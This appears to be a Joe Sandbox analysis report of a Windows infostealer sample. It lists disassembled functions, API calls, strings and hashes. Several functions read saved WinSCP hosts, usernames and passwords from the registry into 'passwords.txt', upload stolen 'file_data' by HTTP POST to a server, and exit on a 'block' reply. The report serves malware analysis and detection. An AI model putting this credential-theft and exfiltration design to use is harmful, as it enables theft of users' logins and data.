                                                                                                                                                                                      • Instruction ID: 1a1ceddee320f98b741e66e992c3f687c8b7afa5f71d80a1b9f850e3ed6d8154
                                                                                                                                                                                      • Opcode Fuzzy Hash: cae16a69884c4065627192b8a2cdd925281d3769dea07b65f7d5750a4d9baf9c
                                                                                                                                                                                      • Instruction Fuzzy Hash: 48011DB6900208AFDB01DFE8DD858DEBBFDEF48214B104865F915E7210D6719E418F51
                                                                                                                                                                                      Function 61E75F1F Relevance: 3.3, Strings: 2, Instructions: 815COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      Strings
                                                                                                                                                                                      • multiple recursive references: %s, xrefs: 61E76A4B
                                                                                                                                                                                      • recursive reference in a subquery: %s, xrefs: 61E76A54
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: multiple recursive references: %s$recursive reference in a subquery: %s
                                                                                                                                                                                      • API String ID: 0-3854365051
                                                                                                                                                                                      • Opcode ID: 297298a0f659725ea1119cf4835fa01018d93a3eeff2d039f5330e37d216fd09
                                                                                                                                                                                      • Instruction ID: 7d5e909c26c2478cc4d8a1152a5e5b16c7ea0641b558a5fde8b477d39de8e8ad
                                                                                                                                                                                      • Opcode Fuzzy Hash: 297298a0f659725ea1119cf4835fa01018d93a3eeff2d039f5330e37d216fd09
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4E8207B4A052899FEB25CFA8C180B9DBBF1BF48308F24C559E859AB355D734E846CF50
                                                                                                                                                                                      Function 0034EA52 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: InfoSystemwsprintf
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2452939696-0
                                                                                                                                                                                      • Opcode ID: 37260c320e2934b3edd434bb4e21e06ea6be4b89b5c5b3024272d17fa86acae3
                                                                                                                                                                                      • Instruction ID: 64351473aec69b119a85756d928a5b0db832dc098b8baae78205d25b76fef53c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 37260c320e2934b3edd434bb4e21e06ea6be4b89b5c5b3024272d17fa86acae3
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7FD05EB180010DDBDF10DBE4EC8A9CD77BCAB04208F4045A1E704F2080F2B5E65E8BD5
                                                                                                                                                                                      Function 61E4B8A1 Relevance: 1.6, APIs: 1, Instructions: 323COMMON
                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1885362292.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1885345307.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885435675.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885456457.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885482285.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885504855.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885528391.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1885567558.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_61e00000_bind.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: memcmp
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1475443563-0
                                                                                                                                                                                      • Opcode ID: 516c7da196c91c56f608f5042f93d451d14bb0a4fe880775d5f0088f7b4adc6f
                                                                                                                                                                                      • Instruction ID: 0d30bdf3ca1535cc6e9debfec2a3fa3a34d16498aff86589297f71c0a5a37c1e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 516c7da196c91c56f608f5042f93d451d14bb0a4fe880775d5f0088f7b4adc6f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7DC15D30E082858BEB15CFA8E4D079D7AF1AF8831CF29C46DD8469B349EB74D885CB51
                                                                                                                                                                                      Function 003420E8 Relevance: 143.7, APIs: 80, Strings: 2, Instructions: 207stringmemoryCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: strlen$Heap$AllocateProcesslstrlen
                                                                                                                                                                                      • String ID: In the interim between those two positions, she studied public health at Witswatersrand Advanced Technikon in 1971, and during her time there, she won an award from the South African Institute of Public Health for obtaining the highest marks in the country$bW5
                                                                                                                                                                                      • API String ID: 2756412249-484018327
                                                                                                                                                                                      • Opcode ID: 01e6f97c7c097e9e6dd265392eee62532ef803b57fd6a9c8e8162e32ad848db1
                                                                                                                                                                                      • Instruction ID: 5c3a144bab48f16d6e0e17e6964402f875840b20fb0b3f972514f0cf2e5545a4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 01e6f97c7c097e9e6dd265392eee62532ef803b57fd6a9c8e8162e32ad848db1
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7F510021582DE97686037BF48E43DFF665E5F06302F140250FC056E2A39B68571A66FF
                                                                                                                                                                                      Function 0034D466 Relevance: 66.9, APIs: 24, Strings: 14, Instructions: 376registryCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • memset.MSVCRT ref: 0034D48A
                                                                                                                                                                                      • memset.MSVCRT ref: 0034D4AA
                                                                                                                                                                                      • memset.MSVCRT ref: 0034D4BE
                                                                                                                                                                                      • memset.MSVCRT ref: 0034D4D2
                                                                                                                                                                                      • memset.MSVCRT ref: 0034D4E1
                                                                                                                                                                                      • memset.MSVCRT ref: 0034D4EF
                                                                                                                                                                                      • memset.MSVCRT ref: 0034D500
                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?), ref: 0034D528
                                                                                                                                                                                      • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0034D550
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0034D562
                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0034D57D
                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?), ref: 0034D597
                                                                                                                                                                                      • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0034D5B4
                                                                                                                                                                                      • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,00000000,?,Host: ,00000000,?,Soft: WinSCP,0035E266), ref: 0034D632
                                                                                                                                                                                      • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,00000000,?,?), ref: 0034D67C
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: memset$Value$CloseOpen$Enum
                                                                                                                                                                                      • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                                                      • API String ID: 4264500687-2798830873
                                                                                                                                                                                      • Opcode ID: 3f067dabf52b8d994a13ffc5798523ac8f46dff277a990a6ccc9912c0e905c0d
                                                                                                                                                                                      • Instruction ID: c7fc131017af16338db544bde2c1a835965f6581bafcb5ca6ee0958efc53b6d7
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3f067dabf52b8d994a13ffc5798523ac8f46dff277a990a6ccc9912c0e905c0d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5ED1DBB280015DAADB16EB90CD92DEEB7BCBF14345F4445A6F506BA091EB706F48CB60
                                                                                                                                                                                      Function 003446BD Relevance: 60.2, APIs: 25, Strings: 9, Instructions: 668stringnetworkmemoryCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 880 3446bd-344785 call 34e57d call 34e5b4 call 343ef3 call 34f8c3 call 34e766 lstrlenA call 34e766 call 34f8c3 call 34e57d * 4 StrCmpCA 903 344787 880->903 904 344788-34478d 880->904 903->904 905 3447ad-344889 call 34f6b1 call 34e682 call 34e63b call 34e5e8 * 2 call 34e6d4 call 34e682 call 34e6d4 call 34e63b call 34e5e8 * 3 call 34e6d4 call 34e682 call 34e63b call 34e5e8 * 2 InternetConnectA 904->905 906 34478f-3447a7 call 34e766 InternetOpenA 904->906 911 344e5e-344e9b call 34f5e9 * 2 call 34e72d * 4 call 34e5b4 905->911 976 34488f-3448c3 HttpOpenRequestA 905->976 906->905 906->911 940 344ea0-344eef call 34e5e8 * 9 911->940 977 344e55-344e58 InternetCloseHandle 976->977 978 3448c9-3448cb 976->978 977->911 979 3448e3-344db7 call 34e6d4 call 34e63b call 34e5e8 call 34e682 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e682 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e682 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 342033 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e682 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e682 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e6d4 call 34e63b call 34e5e8 call 34e766 lstrlenA call 34e766 lstrlenA GetProcessHeap HeapAlloc call 34e766 lstrlenA call 34e766 memcpy call 34e766 lstrlenA memcpy call 34e766 lstrlenA call 34e766 * 2 lstrlenA memcpy call 34e766 lstrlenA call 34e766 HttpSendRequestA call 34f5e9 HttpQueryInfoA 978->979 980 3448cd-3448dd InternetSetOptionA 978->980 1185 344db9-344dc6 call 34e57d 979->1185 1186 344dcb-344ddd call 34f5cc 979->1186 980->979 1185->940 1186->1185 1191 344ddf-344de4 1186->1191 1192 344e18-344e2d InternetReadFile 1191->1192 1193 344de6-344deb 1192->1193 1194 344e2f-344e45 call 34e766 StrCmpCA 1192->1194 1193->1194 1195 344ded-344e13 call 34e6d4 call 34e63b call 34e5e8 1193->1195 1200 344e47-344e48 ExitProcess 1194->1200 1201 344e4e-344e4f InternetCloseHandle 1194->1201 1195->1192 1201->977
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                        • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
                                                                                                                                                                                        • Part of subcall function 00343EF3: ??_U@YAPAXI@Z.MSVCRT(00000400,00361C14,ERROR), ref: 00343F1F
                                                                                                                                                                                        • Part of subcall function 00343EF3: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00361C14,ERROR), ref: 00343F28
                                                                                                                                                                                        • Part of subcall function 00343EF3: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00000400,00361C14,ERROR), ref: 00343F31
                                                                                                                                                                                        • Part of subcall function 00343EF3: lstrlenA.KERNEL32(00000000,00000000,?,?,00361C14,ERROR), ref: 00343F4B
                                                                                                                                                                                        • Part of subcall function 00343EF3: InternetCrackUrlA.WININET(00000000,00000000,?,00361C14), ref: 00343F5B
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 0034472B
                                                                                                                                                                                        • Part of subcall function 0034F8C3: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0035E266,?,0000000F,0000000F,?,0034471F,?,?,?,?), ref: 0034F8E7
                                                                                                                                                                                        • Part of subcall function 0034F8C3: GetProcessHeap.KERNEL32(00000000,?,?,0034471F,?,?,?,?,?,?), ref: 0034F8F4
                                                                                                                                                                                        • Part of subcall function 0034F8C3: RtlAllocateHeap.NTDLL(00000000,?,0034471F,?,?,?,?,?,?), ref: 0034F8FB
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,0035E266,0035E266,0035E266,0035E266), ref: 0034477D
                                                                                                                                                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0034479D
                                                                                                                                                                                      • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0034487E
                                                                                                                                                                                      • HttpOpenRequestA.WININET(?,?,00000000,00000000,-00400100,00000000), ref: 003448B8
                                                                                                                                                                                      • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003448DD
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
                                                                                                                                                                                        • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
                                                                                                                                                                                        • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
                                                                                                                                                                                        • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,?,",00000000,?,file_data,00000000,?,00000000,?,00361348,00000000,?,?,00000000), ref: 00344CBB
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00344CCC
                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00344CDB
                                                                                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 00344CE2
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00344CF4
                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000), ref: 00344D07
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?), ref: 00344D1E
                                                                                                                                                                                      • memcpy.MSVCRT(?), ref: 00344D28
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000), ref: 00344D39
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00344D52
                                                                                                                                                                                      • memcpy.MSVCRT(?), ref: 00344D5F
                                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,?), ref: 00344D74
                                                                                                                                                                                      • HttpSendRequestA.WININET(?,00000000,00000000), ref: 00344D88
                                                                                                                                                                                      • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00344DAF
                                                                                                                                                                                      • InternetReadFile.WININET(?,?,000007CF,?), ref: 00344E25
                                                                                                                                                                                      • StrCmpCA.SHLWAPI(00000000,block), ref: 00344E3D
                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00344E48
                                                                                                                                                                                      • InternetCloseHandle.WININET(?), ref: 00344E58
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrlen$Internet$lstrcpy$Heap$HttpProcessmemcpy$OpenRequestlstrcat$AllocAllocateBinaryCloseConnectCrackCryptExitFileHandleInfoOptionQueryReadSendString
                                                                                                                                                                                      • String ID: ------$"$--$------$ERROR$block$build_id$file_data$f5
                                                                                                                                                                                      • API String ID: 1093660128-2952223706
                                                                                                                                                                                      • Opcode ID: 1a5bdb4bd38bb824b55330405b55fe0e6082b8823bdbf9c7a88b54f3bb6eef1f
                                                                                                                                                                                      • Instruction ID: 8e2087150a53dc4e166b7f63e40979a2f6c9f7e55c079e5ce096aa79f35b2791
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a5bdb4bd38bb824b55330405b55fe0e6082b8823bdbf9c7a88b54f3bb6eef1f
                                                                                                                                                                                      • Instruction Fuzzy Hash: ED329A72800009ABDB06EBE4DC96CEEB7BCBF25304F554165F512AA091EF34BB49CB94
                                                                                                                                                                                      Function 00355BCA Relevance: 48.2, APIs: 32, Instructions: 153libraryloaderCOMMON
                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1286 355bca-355bd6 call 355ba7 1289 355bdc-355dc9 call 34684d GetProcAddress * 20 1286->1289 1290 355dce-355e2a LoadLibraryA * 5 1286->1290 1289->1290 1292 355e2c-355e39 GetProcAddress 1290->1292 1293 355e3e-355e45 1290->1293 1292->1293 1295 355e47-355e6b GetProcAddress * 2 1293->1295 1296 355e70-355e77 1293->1296 1295->1296 1297 355e79-355e86 GetProcAddress 1296->1297 1298 355e8b-355e92 1296->1298 1297->1298 1300 355e94-355ea1 GetProcAddress 1298->1300 1301 355ea6-355ead 1298->1301 1300->1301 1302 355eaf-355ed3 GetProcAddress * 2 1301->1302 1303 355ed8 1301->1303 1302->1303
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
